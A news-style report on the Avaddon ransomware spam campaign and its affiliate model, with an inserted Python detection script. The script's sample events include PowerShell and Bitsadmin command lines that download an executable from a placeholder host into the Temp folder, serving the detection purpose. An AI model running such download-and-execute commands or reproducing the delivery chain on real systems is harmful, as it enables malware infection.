The new Avaddon Ransomware comes to life in a huge spam campaign that targets users around the world.
Avaddon was released earlier this month and recruits active hackers and malware distributors to spread ransomware in every possible way.
As its first known attack, Avaddon Ransomware is being distributed in a spam campaign reminiscent of the February Nemty Ransomware Love Letter campaign.
Do you like my photograph?
In a related report, the cyber security company AppRiver said that the Phorphiex/Trik botnet is distributing the malicious emails.
This campaign is not small: AppRiver security researcher David Picket told us that they had blocked more than 300,000 emails in a short time.
This means that what the recipient sees will appear to be just a .jpg file, as shown below.
When executed, the attached JS will launch a PowerShell and Bitsadmin command to download the Avaddon ransomware executable to the %Temp% folder and run it.
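One way to detect the download step described above in process-creation telemetry, as an added example that is not from the original article: it flags a script host that spawns PowerShell or Bitsadmin with a URL and a Temp path on the command line. The script host names (wscript.exe, cscript.exe), the event field names and the sample events are assumptions constructed for illustration.

```python
import re

# Assumption: a double-clicked .js attachment runs under a Windows script host.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# The two tools the article names for the download step.
DOWNLOADERS = {"powershell.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
TEMP_RE = re.compile(r"%temp%|\$env:temp|\\appdata\\local\\temp\\", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the reasons a process-creation event matches the described chain."""
    if basename(event["parent_image"]) not in SCRIPT_HOSTS:
        return []
    child = basename(event["image"])
    if child not in DOWNLOADERS:
        return []
    reasons = ["script host spawned " + child]
    if URL_RE.search(event["command_line"]):
        reasons.append("command line contains a URL")
    if TEMP_RE.search(event["command_line"]):
        reasons.append("command line references the Temp folder")
    return reasons

def detect(events, min_reasons=2):
    """Return (event, reasons) for events with at least min_reasons indicators."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if len(reasons) >= min_reasons:
            hits.append((event, reasons))
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not captured from a real infection).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "command_line": r"powershell.exe Invoke-WebRequest http://example.invalid/a.exe -OutFile $env:TEMP\a.exe"},
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job1 http://example.invalid/a.exe %TEMP%\a.exe"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell.exe Get-ChildItem"},
    {"parent_image": r"C:\Windows\System32\wscript.exe", "image": PS,
     "command_line": "powershell.exe Get-Date"},
]
```

The default threshold of two indicators keeps a script host that merely starts PowerShell (the last sample event) out of the alert queue while still recording why it scored.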
In the sample tested by BleepingComputer, once run, the ransomware will search for data to encrypt and append the .avdn extension to encrypted files.
In each folder, a ransom note named [id]-readme.html will be created. This ransom note contains a link to the TOR website and a unique victim ID used to access the website.
This TOR payment website includes the ransom amount and instructions on how to pay for a decryptor.
Unfortunately, Michael Gillespie analyzed the ransomware and said that it is secure and cannot be decrypted for free.
In ads published on Russian-language hacking forums earlier this month, Avaddon described itself as a new Ransomware-as-a-Service (RaaS) program.
This means that the ransomware creator is responsible for the development of the malware and the operation of the TOR payment website.
Participants in the program are responsible for the distribution of the ransomware via spam, network compromise and exploit kits.
Under this agreement, Avaddon pays partners 65% of the ransom payments they bring in, and the Avaddon operators receive 35%. Larger partners are usually able to negotiate a higher share of revenue depending on the size of their attacks.
As is typical with RaaS programs, Avaddon has a set of rules that partners must follow when distributing ransomware. The most common rule is that they cannot target victims in the Commonwealth of Independent States (CIS).
Now that the creators of Avaddon have started accepting applications, we should expect to see an increase in distribution and more advanced attacks.